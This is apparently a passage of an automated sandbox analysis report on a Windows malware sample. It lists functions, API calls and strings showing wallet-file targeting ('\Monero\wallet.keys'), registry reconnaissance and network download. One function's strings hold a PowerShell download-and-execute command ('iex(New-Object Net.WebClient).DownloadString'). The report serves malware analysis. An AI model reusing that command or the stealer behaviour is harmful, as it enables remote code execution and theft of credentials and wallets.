                                  • Instruction Fuzzy Hash: F9F05E30908249FFEB44AFE0E90972C7B70FB08703F040298F68996290DA724B41DBD6
                                  Function 00A84780 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0068EA78), ref: 00A847DB
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84801
                                  • lstrcat.KERNEL32(?,?), ref: 00A84820
                                  • lstrcat.KERNEL32(?,?), ref: 00A84834
                                  • lstrcat.KERNEL32(?,0067A5F0), ref: 00A84847
                                  • lstrcat.KERNEL32(?,?), ref: 00A8485B
                                  • lstrcat.KERNEL32(?,0068DB60), ref: 00A8486F
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88D90: GetFileAttributesA.KERNEL32(00000000,?,00A71B54,?,?,00A9564C,?,?,00A90E1F), ref: 00A88D9F
                                    • Part of subcall function 00A84570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A84580
                                    • Part of subcall function 00A84570: RtlAllocateHeap.NTDLL(00000000), ref: 00A84587
                                    • Part of subcall function 00A84570: wsprintfA.USER32 ref: 00A845A6
                                    • Part of subcall function 00A84570: FindFirstFileA.KERNEL32(?,?), ref: 00A845BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID: xh
                                  • API String ID: 2540262943-1570541007
                                  • Opcode ID: 6931e55c6e9ceaa7edd183a66206b6cf066d81461d28c3b0d33c7987bacf650f
                                  • Instruction ID: af309eeab82a118091180a235d6bbe6947a5e42a67875a37a90fa8169555be44
                                  • Opcode Fuzzy Hash: 6931e55c6e9ceaa7edd183a66206b6cf066d81461d28c3b0d33c7987bacf650f
                                  • Instruction Fuzzy Hash: 563152B2900218A7CB14FBB0DD85FED737CBB58700F404599F35996091EE749789CB96
                                  Function 00A74FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A74FCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A74FD1
                                  • InternetOpenA.WININET(00A90DDF,00000000,00000000,00000000,00000000), ref: 00A74FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A75011
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A75041
                                  • InternetCloseHandle.WININET(?), ref: 00A750B9
                                  • InternetCloseHandle.WININET(?), ref: 00A750C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: 14e211366479b25bf7aa43caba5b19b92baf17f141e3617b4edf2095103e0d2b
                                  • Instruction ID: 3ade97bc957d60414a871278cc91e9ca2be8df9538ae38ee8f74acbd8bd42cfd
                                  • Opcode Fuzzy Hash: 14e211366479b25bf7aa43caba5b19b92baf17f141e3617b4edf2095103e0d2b
                                  • Instruction Fuzzy Hash: 2B31F8B4A40218ABDB20CF64DD85BDDB7B4FB48704F1081D9E609A7281DBB06EC58F99
                                  Function 00A883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A88426
                                  • wsprintfA.USER32 ref: 00A88459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A8847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88499
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EE68,00000000,000F003F,?,00000400), ref: 00A884EC
                                  • lstrlen.KERNEL32(?), ref: 00A88501
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EF28,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A90B34), ref: 00A88599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 65c364a5a266ddbeed14baf307567549416e603c40a49b54b7dd9d2289447557
                                  • Instruction ID: f8808d0b14432e0b83b21d8ba1d6b718ef5de10a82f225ada4b417de64aab6e3
                                  • Opcode Fuzzy Hash: 65c364a5a266ddbeed14baf307567549416e603c40a49b54b7dd9d2289447557
                                  • Instruction Fuzzy Hash: 4921EB71910218AFDB24DB54DC85FE9B3B8FB48700F40C5D9E649A6180DF756A85CFD4
                                  Function 00A87690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A876A4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A876AB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBB0,00000000,00020119,00000000), ref: 00A876DD
                                  • RegQueryValueExA.ADVAPI32(00000000,0068EFB8,00000000,00000000,?,000000FF), ref: 00A876FE
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A87708
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 788062a3d18a274a532bfaf1eee1e3cd90bfdbacae3b7b2d555407b8ee65b68e
                                  • Instruction ID: d1808afa7084983e24e66fd96486c97e4b63c21d013af17b03d82034f6a759f9
                                  • Opcode Fuzzy Hash: 788062a3d18a274a532bfaf1eee1e3cd90bfdbacae3b7b2d555407b8ee65b68e
                                  • Instruction Fuzzy Hash: A0016DB5A04308BFEB00EBE4DD49FAEB7B8EB48701F104694FA45E7291EA719900CB51
                                  Function 00A87720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87734
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A8773B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBB0,00000000,00020119,00A876B9), ref: 00A8775B
                                  • RegQueryValueExA.ADVAPI32(00A876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A8777A
                                  • RegCloseKey.ADVAPI32(00A876B9), ref: 00A87784
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: f91eaab309f3bf5fca5e6de95c3d1ee666fa91ec22c20b421613f3bb63518a97
                                  • Instruction ID: 7722c4ef62458a508b50040e58bfe4f533234ccd8473b8c0f7e53fdb55187591
                                  • Opcode Fuzzy Hash: f91eaab309f3bf5fca5e6de95c3d1ee666fa91ec22c20b421613f3bb63518a97
                                  • Instruction Fuzzy Hash: 830117B5A40308BFDB00DBE4DC49FAEB7B8EB44705F104555FA45A7291DA759900CB91
                                  Function 00A799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                  • ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                  • LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                  • CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: fc2c31070f0153c8975251e535d120853064c7e0b3a9e29e22f3ac5d373e82f6
                                  • Instruction ID: 9a3088d0f97e5a2aee19dca482f4660c792e168d815a17bff7796672869a3af3
                                  • Opcode Fuzzy Hash: fc2c31070f0153c8975251e535d120853064c7e0b3a9e29e22f3ac5d373e82f6
                                  • Instruction Fuzzy Hash: 4F3129B4A00209EFDB14CFA4CD85BAF77B5FF48351F108159E905A7290D779AA42CFA1
                                  Function 00A82C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A82D85
                                  Strings
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A82CC4
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A82D04
                                  • ')", xrefs: 00A82CB3
                                  • <, xrefs: 00A82D39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 00247b9a33f1ead60e8290d4613df1895e402eeb8edfd59355b545d8d5ce5a1d
                                  • Instruction ID: b446a1e40d832cf153428e39e770122ae4c74b500c938e78efda2144dcaf6729
                                  • Opcode Fuzzy Hash: 00247b9a33f1ead60e8290d4613df1895e402eeb8edfd59355b545d8d5ce5a1d
                                  • Instruction Fuzzy Hash: 6C419E71D102089AEB18FBA0C991FEDBB74BF24340F50455AE116B7191DF786A4ACFA1
                                  Function 00A79E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00A79F41
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: e43b3c882c8bd764a79c3c6e8e669bae6b0aa5621cbb22924586f21480a2877c
                                  • Instruction ID: 04871f94a63eca2d09d6fbadf6d09dc697b7283b05bb7afa0534647e5d62776c
                                  • Opcode Fuzzy Hash: e43b3c882c8bd764a79c3c6e8e669bae6b0aa5621cbb22924586f21480a2877c
                                  • Instruction Fuzzy Hash: 08613E71A00248ABDB18EFA4CD96FED77B5BF54340F00C518F90A9B591EB746A06CB92
                                  Function 00A86920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00A8696C
                                  • sscanf.NTDLL ref: 00A86999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A869B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00A869C0
                                  • ExitProcess.KERNEL32 ref: 00A869DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 498c0a500d9a46e9d7c0505fa7f96530378ef66457b4577f15f6a0925bd94380
                                  • Instruction ID: acf5ed9a6e300e1f10b5326cd71e5e3317946873f4ff6237611cd47ced93820b
                                  • Opcode Fuzzy Hash: 498c0a500d9a46e9d7c0505fa7f96530378ef66457b4577f15f6a0925bd94380
                                  • Instruction Fuzzy Hash: 9621DC75D14208ABDF04EFE4D945AEEB7B9FF48300F04856EE406E3250EB355605CB65
                                  Function 00A87E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A87E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0067BBE8,00000000,00020119,?), ref: 00A87E5E
                                  • RegQueryValueExA.ADVAPI32(?,0068D9A0,00000000,00000000,000000FF,000000FF), ref: 00A87E7F
